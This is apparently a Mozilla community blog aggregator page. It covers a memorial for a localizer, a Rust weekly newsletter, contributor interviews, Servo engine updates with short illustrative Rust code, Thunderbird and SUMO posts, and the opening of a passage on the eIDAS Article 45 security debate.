Beyond her wisdom, Dian Ina was a source of light and laughter. Her fun-loving nature and infectious energy made her the key person everyone turned to when they were looking for recommendations, whether it was for the best restaurant in town, a great book, or even advice on life itself. Her opinions were trusted, not only for their insight but also for the care she took in considering what would truly benefit others.

Her impact on those around her was immeasurable. She leaves behind a legacy of warmth, wisdom, and a deep sense of trust from everyone who had the privilege of knowing her. We will miss her dearly, but her spirit and the lessons she shared will live on in the hearts of all who knew her.

Here are some of the memories that people shared about Dian Ina:

  • Franc: Ina was a funny person, always with a smile. We shared many events like All Hands, Leadership Summit and more. Que la tierra te sea leve. (May the earth rest lightly upon you.)

  • Rosana Ardila: Dian Ina was a wonderful human being. I remember her warm smile, when she was supporting the community, talking about art or food. She was independent and principled and so incredibly fun to be around. I was looking forward to seeing her again, touring her museum in Jakarta, discovering more food together, talking about art and digital life, the little things you do with people you like. She was so multifaceted, so smart and passionate. She left a mark on me and I will remember her, I’ll keep the memory of her big smile with me.
  • Delphine: I am deeply saddened to hear of Dian Ina’s passing. She was a truly kind and gentle soul, always willing to lend a hand. I will cherish the memories of our conversations and her dedication to her work as a localizer and valued member of the Mozilla community. Her presence will be profoundly missed.
  • Fauzan: For me, Ina is the best mentor in conflict resolution, design, art, and L10n. She is totally irreplaceable in the Indonesian community. We already miss her a lot.
  • William: I will never forget that smile and that contagious laughter of yours. I have such fond memories of my many trips to Jakarta, in large part thanks to you. May you rest in peace dearest Dian Ina.

  • Amira Dhalla: I’m going to remember Ina as the thoughtful, kind, and warm person she always was to everyone around her. We have many memories together but I specifically remember us giggling and jumping around together on the grounds of a castle in Scotland. We had so many fun memories together talking technology, art, and Indonesia. I’m saddened by the news of her passing but comforted by the Mozilla community honoring her in a special way and know we will keep her legacy alive.

  • Kiki: Mbak Ina was one of the female leaders I looked up to within the Mozilla Indonesia Community. She embodied all the definition of a smart and capable woman. The kind who was brave, assertive and above all, so fun to be around. I like that she can keep things real by not being afraid of sharing the hard truth, which is truly appreciative within a community setting. I always thought about her and her partner (Mas Mahen) as a fun and intelligent couple. Deep condolences to Mas Mahen and her entire family in Malang and Bandung. She left a huge mark on the Mozilla Indonesia Community, and she’ll be deeply missed.

  • Joe Cheng: I am deeply saddened to hear of Dian Ina’s passing. As the Product Manager for Firefox Lite, I had the privilege of witnessing her invaluable contributions firsthand. Dian was not only a crucial part of Mozilla’s community in Indonesia but also a driving force behind the success of Firefox Lite and other Mozilla projects. Her enthusiasm, unwavering support, and kindness left an indelible mark on everyone who met her. I fondly remember the time my team and I spent with her during our visit to Jakarta, where her vibrant spirit and warm smiles brought joy to our interactions. Dian’s positive energy and dedication will be remembered always, and her legacy will live on in the Mozilla community and beyond. She will be dearly missed.

This Week In RustThis Week in Rust 573

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is struct-split, a proc macro to implement partial borrows.

Thanks to Felix for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

403 pull requests were merged in the last week

Rust Compiler Performance Triage

Regressions primarily in doc builds. No significant changes in cycle or max-rss counts.

Triage done by @simulacrum. Revision range: 27e38f8f..d4822c2d

1 Regressions, 1 Improvements, 4 Mixed; 1 of them in rollups
47 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-11-13 - 2024-12-11 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Netstack3 encompasses 63 crates and 60 developer-years of code. It contains more code than the top ten crates on crates.io combined. ... For the past eleven months, they have been running the new networking stack on 60 devices, full time. In that time, Liebow-Feeser said, most code would have been expected to show "mountains of bugs". Netstack3 had only three; he attributed that low number to the team's approach of encoding as many important invariants in the type system as possible.

Joshua Liebow-Feeser at RustConf, as reported by Daroc Alden on Linux Weekly News

Thanks to Anton Fetisov for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

About:CommunityContributor spotlight – MyeongJun Go

The beauty of open source software lies in the collaborative spirit of its contributors. In this post, we’re highlighting the story of MyeongJun Go (Jun), who has been a dedicated contributor to the Performance Tools team. His contributions have made a remarkable impact on performance testing and tooling, from local tools like Mach Try Perf and Raptor to web-based tools such as Treeherder. Thanks to Jun, developers are even more empowered to improve the performance of our products.

Open source has offered me invaluable lessons that are hard to gain elsewhere. Working with people from around the world, I’ve learned effective collaboration practices that help us minimize disruptions and improve development quality. From code reviews, writing test cases, to clean code and refactoring practices, I’ve gained essential skills for producing maintainable, high quality code.

Q: Can you tell us a little about how you first got involved with Mozilla?

I felt a constant thirst for development while working on company services. I wanted to create something that could benefit the world and collaborate with developers globally. That’s when I decided to dive into open source development.

Around that time, I was already using Firefox as my primary browser, and I frequently referenced MDN for work, naturally familiarizing myself with Mozilla’s services. One day, I thought, how amazing would it be to contribute to a Mozilla open source project used by people worldwide? So, I joined an open source challenge.

At first, I wondered, can I really contribute to Firefox? But thanks to the supportive Mozilla staff, I was able to tackle one issue at a time and gradually build my experience.

Q: Your contributions have had a major impact on performance testing and tooling. What has been your favourite or most rewarding project to work on so far?

I’ve genuinely found every project and task rewarding—and enjoyable too. Each time I completed a task, I felt a strong sense of accomplishment.

If I had to pick one particularly memorable project, it would be the Perfdocs tool. It was my first significant project when I started contributing more actively, and its purpose is to automate documentation for the various performance tools scattered across the ecosystem. With every code push, Perfdocs automatically generates documentation in “Firefox Source Docs”.

Working on this tool gave me the chance to familiarize myself with various performance tools one by one, while also building confidence in contributing. It was rewarding to enhance the features and see the resulting documentation instantly, making the impact very tangible. Hearing from other developers about how much it simplified their work was incredibly motivating and made the experience even more fulfilling.

Q: Performance tools are critical for developers. Can you walk us through how your work helps improve the overall performance of Mozilla products?

I’ve applied various patches across multiple areas, but updates to tools like Mach Try Perf and Perfherder, which many users rely on, have had a particularly strong impact.

With Mach Try Perf, developers can easily perform performance tests by platform and category, comparing results between the base commit (before changes) and the head commit (after changes). However, since each test can take considerable time, I developed a caching feature that stores test results from previous runs when the base commit is the same. This allows us to reuse existing results instead of re-running tests, significantly reducing the time needed for performance testing.

I also developed several convenient flags to enhance testing efficiency. For instance, when an alert occurs in Perfherder, developers can now re-run tests simply by using the “–alert” flag with the alert ID in the Mach Try Perf command.

Additionally, I recently integrated Perfherder with Bugzilla to automatically file bugs. Now, with just a click of the ‘file bug’ button, related bugs are filed automatically, reducing the need for manual follow-up.

These patches, I believe, have collectively helped improve the productivity of Mozilla’s developers and contributors, saving a lot of time in the development process.

Q: How much of a challenge do you find being in a different time zone to the rest of the team? How do you manage this?

I currently live in South Korea (GMT+9), and most team meetings are scheduled from 10 PM to midnight my time. During the day, I focus on my job, and in the evening, I contribute to the project. This setup actually helps me use my time more efficiently. In fact, I sometimes feel that if we were in the same time zone, balancing both my work and attending team meetings might be even more challenging.

Q: What are some tools or methodologies you rely on?

When developing Firefox, I mainly rely on two tools: Visual Studio Code (VSC) on Linux and SearchFox. SearchFox is incredibly useful for navigating Mozilla’s vast codebase, especially as it’s web-based and makes sharing code with teammates easy.

Since Mozilla’s code is open source, it’s accessible for the world to see and contribute to. This openness encourages me to seek feedback from mentors regularly and to focus on refactoring through detailed code reviews, with the goal of continually improving code quality.

I’ve learned so much in this process, especially about reducing code complexity and enhancing quality. I’m always grateful for the detailed reviews and constructive feedback that help me improve.

Q: Are there any exciting projects you’d like to work on?

I’m currently finding plenty of challenge and growth working with testing components, so rather than seeking new projects, I’m focused on my current tasks. I’m also interested in learning Rust and exploring trends like AI and blockchain.

Recently, I’ve considered ways to improve user convenience in tools like Mach Try Perf and Perfherder, such as making test results clearer and easier to review. I’m happy with my work and growth here, but I keep an open mind toward new opportunities. After all, one thing I’ve learned in open source is to never say, ‘I can’t do this.’

Q: What advice would you give to someone new to contributing?

If you’re starting as a contributor to the codebase, building it alone might feel challenging. You might wonder, “Can I really do this?” But remember, you absolutely can. There’s one thing you’ll need: persistence. Hold on to a single issue and keep challenging yourself. As you solve each issue, you’ll find your skills growing over time. It’s a meaningful challenge, knowing that your contributions can make a difference. Contributing will make you more resilient and help you grow into a better developer.

Q: What’s something you’ve learned during your time working on performance tools?

Working with performance tools has given me valuable experience across a variety of tools, from local ones like Mach Try Perf, Raptor, and Perfdocs to web based tools such as Treeherder and Perfherder. Not only have I deepened my technical skills, but I also became comfortable using Python, which wasn’t my primary language before.

Since Firefox runs across diverse environments, I learned how to execute individual tests for different conditions and manage and visualize performance test results efficiently. This experience taught me the full extent of automation’s capabilities and inspired me to explore how far we can push it.

Through this large scale project, I’ve learned how to approach development from scratch, analyze requirements, and carry out development while considering the impact of changes. My skills in impact analysis and debugging have grown significantly.

Open source has offered me invaluable lessons that are hard to gain elsewhere. Working with people from around the world, I’ve learned effective collaboration practices that help us minimize disruptions and improve development quality. From code reviews, writing test cases, to clean code and refactoring practices, I’ve gained essential skills for producing maintainable, high quality code.

Q: What do you enjoy doing in your spare time when you’re not contributing to Mozilla?

I really enjoy reading and learning new things in my spare time. Books offer me a chance to grow, and I find it exciting to dive into new subjects. I also prioritize staying active with running and swimming to keep both my body and mind healthy. It’s a great balance that keeps me feeling refreshed and engaged.


Interested in contributing to performance tools like Jun? Check out our wiki to learn more.

The Servo BlogBehind the code: an interview with msub2

Behind the Code is a new series of interviews with the contributors who help propel Servo forward. Ever wondered why people choose to work on web browsers, or how they get started? We invite you to look beyond the project’s pull requests and issue reports, and get to know the humans who make it happen.


msub2

Some representative contributions:

Tell us about yourself!

My name is Daniel, though I more commonly go by my online handle “msub2”. I’m something of a generalist, but my primary interests are developing for the web, XR, and games. I created and run the WebXR Discord, which has members from both the Immersive Web Working Group and the Meta Browser team, among others. In my free time (when I’m not working, doing Servo things, or tending to my other programming projects) I’m typically watching videos from YouTube/Dropout/Nebula/etc and playing video games.

Why did you start contributing to Servo?

A confluence of interests, to put it simply. I was just starting to really get into Rust, having built a CHIP-8 emulator and an NES emulator to get my hands dirty, but I also had prior experience contributing to other browser projects like Chromium and Gecko. I was also eyeing Servo’s WebXR implementation (which I had submitted a couple small fixes for last year) as I could see there was still plenty of work that could be done there. To get started though, I looked for an adjacent area that I could work on to get familiar with the main Servo codebase, which led to my first contribution being support for non-XR gamepads!

What was challenging about your first contribution?

I’d say the most challenging part of my first contribution was twofold: first, getting oriented with how data flows in and out of Servo via the embedding API, and second, understanding how DOM structs, methods, and codegen all worked together in the script crate. Servo is a big project, but luckily I got lots of good help and feedback as I was working through it, which definitely made things easier. Looking at existing examples in the codebase of the things I was trying to do got me the rest of the way there, I’d say.

What do you like about contributing to the project? What do you get out of it?

The thing I like most about Servo (and perhaps the web platform as an extension) is the amount of interesting problems that there are to solve when it comes to implementing/supporting all of its different features. While most of my contributions so far have been focused around Gamepad and WebXR, recently I’ve been working to help implement SubtleCrypto alongside another community member, which has been really interesting! In addition to the satisfaction I get just from being able to solve interesting problems, I also rather enjoy the feeling of contributing to a large, communal, open-source project.

Any final thoughts you’d like to share?

I’d encourage anyone who’s intrigued by the idea of contributing to Servo to give it a shot! The recent waves of attention for projects like Verso and Ladybird have shown that there is an appetite for new browsers and browser engines, and with Servo’s history it just feels right that it should finally be able to rise to a more prominent status in the ecosystem.

Don MartiLinks for 10 November 2024

Signal Is Now a Great Encrypted Alternative to Zoom and Google Meet These updates mean that Signal is now a free, robust, and secure video conferencing service that can hang with the best of them. It lets you add up to 50 people to a group call and there is no time limit on each call.

The New Alt Media and the Future of Publishing - Anil Dash

I’m a neuroscientist who taught rats to drive − their joy suggests how anticipating fun can enrich human life

Ecosia and Qwant, two European search engines, join forces

What can McCain’s Grand Prix win teach us? Nothing new Ever since Byron Sharp decided he was going for red for his book cover, marketing thinkers have assembled a quite extraordinary disciplinary playbook. And it’s one that looks nothing like the existing stuff that it replaced. Of course, the majority of marketers know nothing about any of it. They inhabit the murkier corners of marketing, where training is rejected because change is held up as a circuit-breaker for learning anything from the past. AI and the ‘new consumer’ mean everything we once knew is pointless now. Better to be ignorant and untrained than waste time on irrelevant historical stuff. But for those who know that is bullshit, who study, who respect marketing knowledge, who know the foundations do not change, the McCain case is a jewel sparkling with everything we have learned in these very fruitful 15 years.

The Counterculture Switch: creating in a hostile environment

Why Right-Wing Media Thrives While The Left Gets Left Behind

The Rogue Emperor, And What To Do About Them Anywhere there is an organisation or group that is centred around an individual, from the smallest organisation upwards, it’s possible for it to enter an almost cult-like state in which the leader both accumulates too much power, and loses track of some of the responsibilities which go with it. If it’s a tech company or a bowls club we can shrug our shoulders and move to something else, but when it occurs in an open source project and a benevolent dictator figure goes rogue it has landed directly on our own doorstep as the open-source community.

We need a Wirecutter for groceries

Historic calculators invented in Nazi concentration camp will be on exhibit at Seattle Holocaust center

One Company A/B Tested Hybrid Work. Here’s What They Found. According to the Society of Human Resource Management, each quit costs companies at least 50% of the employees’ annual salary, which for Trip.com would mean $30,000 for each quit. In Trip.com’s experiment, employees liked hybrid so much that their quit rates fell by more than a third — and saved the company millions of dollars a year.

Mozilla ThunderbirdVIDEO: Q&A with Mark Surman

Last month we had a great chat with two members of the Thunderbird Council, our community governance body. This month, we’re looking at the relationship between Thunderbird and our parent organization, MZLA, and the broader Mozilla Foundation. We couldn’t think of a better way to do this than sitting down for a Q&A with Mark Surman, president of the Mozilla Foundation.

We’d love to hear your suggestions for topics or guests for the Thunderbird Community Office Hours! You can always send them to officehours@thunderbird.org.

October Office Hours: Q&A with Mark Surman

In many ways, last month’s office hours was a perfect lead-in to this month’s, as our community and Mozilla have been big parts of the Thunderbird story. Even though this year marks 20 years since Thunderbird 1.0, Thunderbird started as ‘Minotaur’ alongside ‘Phoenix,’ the original name for Firefox, in 2003. Heather, Monica, and Mark all discuss Thunderbird’s now decades-long journey, but this chat isn’t just about our past. We talk about what we hope is a long future, and how and where we can lead the way.

If you’ve been a long-time user of Thunderbird, or are curious about how Thunderbird, MZLA, and the Mozilla Foundation all relate to each other, this video is for you.

Watch, Read, and Get Involved

We’re so grateful to Mark for joining us, and for turning an invite during a chat at MozWeek into reality! We hope this video gives richer context to Thunderbird’s past as it highlights one of the main characters in our long story.

VIDEO (Also on Peertube):

Thunderbird and Mozilla Resources:

The post VIDEO: Q&A with Mark Surman appeared first on The Thunderbird Blog.

Andrew HalberstadtJujutsu: A Haven for Mercurial Users at Mozilla

One of the pleasures of working at Mozilla has been learning and using the Mercurial version control system. Over the past decade, I’ve spent countless hours tinkering with my workflow to get it just so: reading docs and articles, meticulously tweaking settings and even writing an extension.

I used to be very passionate about Mercurial. But as time went on, the culture at Mozilla started changing. More and more repos were created on GitHub, and more and more developers started using git-cinnabar to work on mozilla-central. Then my role changed, and I found that 90% of my work was happening outside of mozilla-central and the Mercurial garden I had created for myself.

So it was with a sense of resigned inevitability that I took the news that Mozilla would be migrating mozilla-central to Git. The fire in me was all but extinguished; I was resigned to my fate. And what’s more, I had to agree. The time had come for Mozilla to officially make the switch.

Glandium wrote an excellent post outlining some of the history of the decisions made around version control, putting them into the context of the time. In that post, he offers some compelling wisdom to Mercurial holdouts like myself:

I’ll swim against the current here, and say this: the earlier you can switch to git, the earlier you’ll find out what works and what doesn’t work for you, whether you already know Git or not.

When I read that, I had to agree. But I just couldn’t bring myself to do it. No, if I was going to have to give up my revsets and changeset obsolescence and my carefully curated workflows, then so be it. But damnit! I was going to continue using them for as long as possible.

And I’m glad I didn’t switch because then I stumbled upon Jujutsu.

The Servo BlogThis month in Servo: faster fonts, fetches, and flexbox!

Servo nightly showing new support for non-ASCII characters in <img srcset>, ‘transition-behavior: allow-discrete’, ‘mix-blend-mode: plus-lighter’, and ‘width: stretch’

Servo now supports ‘mix-blend-mode: plus-lighter’ (@mrobinson, #34057) and ‘transition-behavior: allow-discrete’ (@Loirooriol, #33991), including in the ‘transition’ shorthand (@Loirooriol, #34005), along with the fetch metadata request headers ‘Sec-Fetch-Site’, ‘Sec-Fetch-Mode’, ‘Sec-Fetch-User’, and ‘Sec-Fetch-Dest’ (@simonwuelker, #33830).

We now have partial support for the CSS size keywords ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ (@Loirooriol, #33558, #33659, #33854, #33951), including in floats (@Loirooriol, #33666), atomic inlines (@Loirooriol, #33737), and elements with ‘position: absolute’ or ‘fixed’ (@Loirooriol, #33950).

We’re implementing the SubtleCrypto API, starting with full support for crypto.subtle.digest() (@simonwuelker, #34034), partial support for generateKey() with AES-CBC and AES-CTR (@msub2, #33628, #33963), and partial support for encrypt() and decrypt() with AES-CBC (@msub2, #33795).

More engine changes

Servo’s architecture is improving, with a new cross-process compositor API that reduces memory copy overhead for video (@mrobinson, @crbrz, #33619, #33660, #33817). We’ve also started phasing out our old OpenGL bindings (gleam and sparkle) in favour of glow, which should reduce Servo’s complexity and binary size (@sagudev, @mrobinson, surfman#318, webxr#248, #33538, #33910, #33911).

We’ve updated to Stylo 2024-10-04 (@Loirooriol, #33767) and wgpu 23 (@sagudev, #34073, #33819, #33635). The new version of wgpu includes several patches from @sagudev, adding support for const_assert, as well as accessing const arrays with runtime index values. We’ve also reworked WebGPU canvas presentation to ensure that we never use old buffers by mistake (@sagudev, #33613).

We’ve also landed a bunch of improvements to our DOM geometry APIs, with DOMMatrix now supporting toString() (@simonwuelker, #33792) and updating is2D on mutation (@simonwuelker, #33796), support for DOMRect.fromRect() (@simonwuelker, #33798), and getBounds() on DOMQuad now handling NaN correctly (@simonwuelker, #33794).

We now correctly handle non-ASCII characters in <img srcset> (@evuez, #33873), correctly handle data: URLs in more situations (@webbeef, #33500), and no longer throw an uncaught exception when pages try to use IntersectionObserver (@mrobinson, #33989).

Outreachy contributors are doing great work in Servo again, helping us land many of this month’s improvements to GC static analysis (@taniishkaa, @webbeef, @chickenleaf, @jdm, @jahielkomu, @wulanseruniati, @lauwwulan, #33692, #33706, #33800, #33774, #33816, #33808, #33827, #33822, #33820, #33828, #33852, #33843, #33836, #33865, #33862, #33891, #33888, #33880, #33902, #33892, #33893, #33895, #33931, #33924, #33917, #33921, #33958, #33920, #33973, #33960, #33928, #33985, #33984, #33978, #33975, #34003, #34002) and code health (@chickenleaf, @DileepReddyP, @taniishkaa, @mercybassey, @jahielkomu, @cashall-0, @tony-nyagah, @lwz23, @Noble14477, #33959, #33713, #33804, #33618, #33625, #33631, #33632, #33633, #33643, #33643, #33646, #33648, #33653, #33664, #33685, #33686, #33689, #33686, #33690, #33705, #33707, #33724, #33727, #33728, #33729, #33730, #33740, #33744, #33757, #33771, #33757, #33782, #33790, #33809, #33818, #33821, #33835, #33840, #33853, #33849, #33860, #33878, #33881, #33894, #33935, #33936, #33943).

Performance improvements

Our font system is faster now, with reduced latency when loading system fonts (@mrobinson, #33638), layout no longer blocking on sending font data to WebRender (@mrobinson, #33600), and memory-mapped system fonts on macOS and FreeType platforms like Linux (@mrobinson, @mukilan, #33747).

Servo now has a dedicated fetch thread (@mrobinson, #33863). This greatly reduces the number of IPC channels we create for individual requests, and should fix crashes related to file descriptor exhaustion on some platforms. Brotli-compressed responses are also handled more efficiently, such that we run the parser with up to 8 KiB of decompressed data at a time, rather than only 10 bytes of compressed data at a time (@crbrz, #33611).
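
To make the Brotli change concrete, here is a minimal Rust sketch (not Servo's actual code) of the idea: wrap the response body in a streaming decompressor and hand the parser whole decompressed chunks rather than a trickle of compressed bytes. The feed_to_parser callback and the 8 KiB buffer are illustrative assumptions; the decoder could be any streaming decompressor that implements Read, such as a Brotli reader over the network response.

    use std::io::Read;

    // Minimal sketch, not Servo's actual code: drive a parser with sizeable
    // decompressed chunks instead of tiny compressed ones.
    fn pump_decompressed<R: Read>(
        mut decoder: R,
        mut feed_to_parser: impl FnMut(&[u8]),
    ) -> std::io::Result<()> {
        let mut buf = [0u8; 8 * 1024]; // up to 8 KiB of decompressed data per step
        loop {
            let n = decoder.read(&mut buf)?;
            if n == 0 {
                break; // end of the response body
            }
            feed_to_parser(&buf[..n]);
        }
        Ok(())
    }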

Flexbox layout now uses caching to avoid doing unnecessary work (@mrobinson, @Loirooriol, #33964, #33967), and now has experimental tracing-based profiling support (@mrobinson, #33647), which in turn no longer spams RUST_LOG=info when not enabled (@delan, #33845). We’ve also landed optimisations in table layout (@Loirooriol, #33575) and in our layout engine as a whole (@Loirooriol, #33806).
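
The caching idea is easy to picture with a small sketch. The Rust snippet below is purely illustrative and does not reflect Servo's real layout data structures; it only shows a flex item's measured size being memoized per inline-size constraint so that a repeated pass over the same item can skip a full relayout.

    use std::collections::HashMap;

    // Illustrative only: cache a measured (width, height) per inline-size
    // constraint, recomputing layout only on a cache miss.
    #[derive(Default)]
    struct FlexItemCache {
        by_inline_size: HashMap<u64, (f32, f32)>,
    }

    impl FlexItemCache {
        fn measure(
            &mut self,
            inline_size: u64,
            layout: impl FnOnce() -> (f32, f32),
        ) -> (f32, f32) {
            *self.by_inline_size.entry(inline_size).or_insert_with(layout)
        }
    }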

Work continues on making our massive script crate build faster, with improved incremental builds (@sagudev, @mrobinson, #33502) and further patches towards splitting script into smaller crates (@sagudev, @jdm, #33627, #33665).

We’ve also fixed several crashes, including when initiating a WebXR session on macOS (@jdm, #33962), when laying out replaced elements (@Loirooriol, #34006), when running JavaScript modules (@jdm, #33938), and in many situations when garbage collection occurs (@chickenleaf, @taniishkaa, @Loirooriol, @jdm, #33857, #33875, #33904, #33929, #33942, #33976, #34019, #34020, #33965, #33937).

servoshell, embedding, and devtools

Devtools support (--devtools 6080) is now compatible with Firefox 131+ (@eerii, #33661), and no longer lists iframes as if they were inspectable tabs (@eerii, #34032).

Servo-the-browser now avoids unnecessary redraws (@webbeef, #34008), massively reducing its CPU usage, and no longer scrolls too slowly on HiDPI systems (@nicoburns, #34063). We now update the location bar when redirects happen (@rwakulszowa, #34004), and these updates are sent to all embedders of Servo, not just servoshell.

We’ve added a new --unminify-css option (@Taym95, #33919), allowing you to dump the CSS used by a page like you can for JavaScript. This will pave the way for allowing you to modify that CSS for debugging site compat issues, which is not yet implemented.

We’ve also added a new --screen-size option that can help with testing mobile websites (@mrobinson, #34038), renaming the old --resolution option to --window-size, and we’ve removed --no-minibrowser mode (@Taym95, #33677).

We now publish nightly builds for OpenHarmony on servo.org (@mukilan, #33801). When running servoshell on OpenHarmony, we now display toasts when pages load or panic (@jschwe, #33621), and you can now pass certain Servo options via hdc shell aa start or a test app (@jschwe, #33588).

Donations

Thanks again for your generous support! We are now receiving 4201 USD/month (+1.3% over September) in recurring donations. We are no longer accepting donations on LFX — if you were donating there, please move your recurring donations to GitHub or Open Collective.

Servo is also on thanks.dev, and already ten GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.



With this money, we’ve been able to pay for a second Outreachy intern in this upcoming round, plus our web hosting and self-hosted CI runners for Windows and Linux builds. When the time comes, we’ll also be able to afford macOS runners and perf bots! As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Conference talks

Support.Mozilla.OrgCelebrating our top contributors on Firefox’s 20th anniversary

Firefox was built by a group of passionate developers, and has been supported by a dedicated community of caring contributors since day one.

The SUMO platform was originally built in 2007 to provide an open-source community support channel for users, and to help us collaborate more effectively with our volunteer contributors.

Over the years, SUMO has become a powerful platform that helps users get the most out of Firefox, provides opportunities for users to connect and learn more from each other, and allows us to gather important insights – all powered by our community of contributors.

SUMO is not just a support platform but a place where other like-minded users, who care about making the internet a better place for everyone, can find opportunities to grow their skills and contribute.

Our contributor community has been integral to Firefox’s success. Contributors humanize the experience across our support channels, champion meaningful fixes and changes, and help us onboard the next generation of Firefox users (and potential contributors!).

Fun facts about our community:

  • We’re global! We have active contributors in 63 countries.
  • 6 active contributors have been with us since day one (Shout outs to Cor-el, jscher2000, James, mozbrowser, AliceWyman, and marsf) and 16 contributors have been here for 15+ years!
  • In 2024*, our contributor community responded to 18,390 forum inquiries, made 747 en-US revisions and 5,684 l10n revisions to our Knowledge Base, responded to 441 Tweets, and issued 1,296 Play Store review responses (*from Jan-Oct 2024 for Firefox desktop, Android, and iOS; non-OP and non-staff)

Screenshot of the top contributors from Jan-Oct 2024

Chart reflects top contributors for Firefox (Desktop, Android, and iOS)

Highlights from throughout the years:

Started in October 2007, SUMO has evolved in many different ways, but its spirit remains the same. It supports our wider user community while also allowing us to build strong relationships with our contributors. Below is a timeline of some key moments in SUMO’s history:

  • 2 October 2007 – SUMO launched on TikiWiki. Knowledge Base was implemented in this initial phase, but article localization wasn’t supported until February 2008.
  • 18 December 2007 – Forum went live
  • 28 December 2007 – Live chat launched
  • 5 February 2009 – SUMO logo was introduced
  • 11 October 2010 – We expanded to Twitter (now X) supported by the Army of Awesome
  • December 2010 – SUMO migrated from TikiWiki to Kitsune. The migration was done in stages and lasted most of 2010.
  • 14 March 2021 – We expanded to take on Play Store support and consolidated our social support platforms in Conversocial/Verint
  • 9 November 2024 – Our SUMO channels are largely powered by active contributors across forums, Knowledge Base and social

We are so grateful for our active community of contributors who bring our mission to life every day. Special thanks to those of you who have been with us since the beginning.

And to celebrate this milestone, we are going to reward top contributors (>99 contributions) for all products in 2024 with a special SUMO badge. Additionally, contributors with more than 999 contributions throughout SUMO’s existence and those with >99 contributions in 2024 will be given swag vouchers to shop at Mozilla’s swag stores.

Cheers to the progress we’ve made, and the incredible foundation we’ve built together. The best is yet to come!

 

P.S. Thanks to Chris Ilias for additional note on SUMO's history.

Mozilla Privacy BlogJoin Us to Mark 20 Years of Firefox

You’re invited to Firefox’s 20th birthday!

 

We’re marking 20 years of Firefox — the independent open-source browser that has reshaped the way millions of people explore and experience the internet. Since its launch, Firefox has championed privacy, security, and transparency, and has put control back in the hands of people online.

Come celebrate two decades of innovation, advocacy, and community — while looking forward to what’s to come.

The post Join Us to Mark 20 Years of Firefox appeared first on Open Policy & Advocacy.

Mozilla Privacy BlogBehind the Scenes of eIDAS: A Look at Article 45 and Its Implications

On October 21, 2024, Mozilla hosted a panel discussion during the Global Encryption Summit to explore the ongoing debate around Article 45 of the eIDAS regulation. Moderated by Robin Wilton from the Internet Society, the panel featured experts Dennis Jackson from Mozilla, Alexis Hancock from Certbot at EFF, and Thomas Lohninger from epicenter.works. Our panelists provided their insights on the technical, legal, and privacy concerns surrounding Article 45 and the potential impact on internet security and privacy. The panel, facilitated by Mozilla in connection with its membership on the Global Encryption Coalition Steering Committee, was part of the annual celebration of Global Encryption Day on October 21.

What is eIDAS and Why is Article 45 Important?

The original eIDAS regulation, introduced in 2014, aimed to create a unified framework for secure electronic identification (eID) and trust services across the European Union. Such trust services, provided by designated Trust Service Providers (TSPs), included electronic signatures, timestamps, and website authentication certificates. Subsequently, Qualified Web Authentication Certificates (QWACs) were also recognized as a method to verify that the entity behind a website also controls the domain in an effort to increase trust amongst users that they are accessing a legitimate website.

Over the years, the cybersecurity community has expressed its concerns about users’ privacy and security regarding the use of QWACs, as they can lead to a false sense of security. Despite this criticism, in 2021, an updated EU proposal to the original law, in essence, aimed to mandate the recognition of QWACs as long as they were issued by qualified TSPs. This, in practice, would undermine decades of web security measures and put users’ privacy and security at stake.

The Security Risk Ahead campaign raised awareness and addressed these issues by engaging widely with policymakers, including through a public letter signed by more than 500 experts that was also endorsed by organizations including the Internet Society, European Digital Rights (EDRi), EFF, and epicenter.works, among others.

The European Parliament introduced last-minute changes to mitigate risks of surveillance and fraud, but these safeguards now need to be technically implemented to protect EU citizens from potential exposure.

Technical Concerns and Security Risks

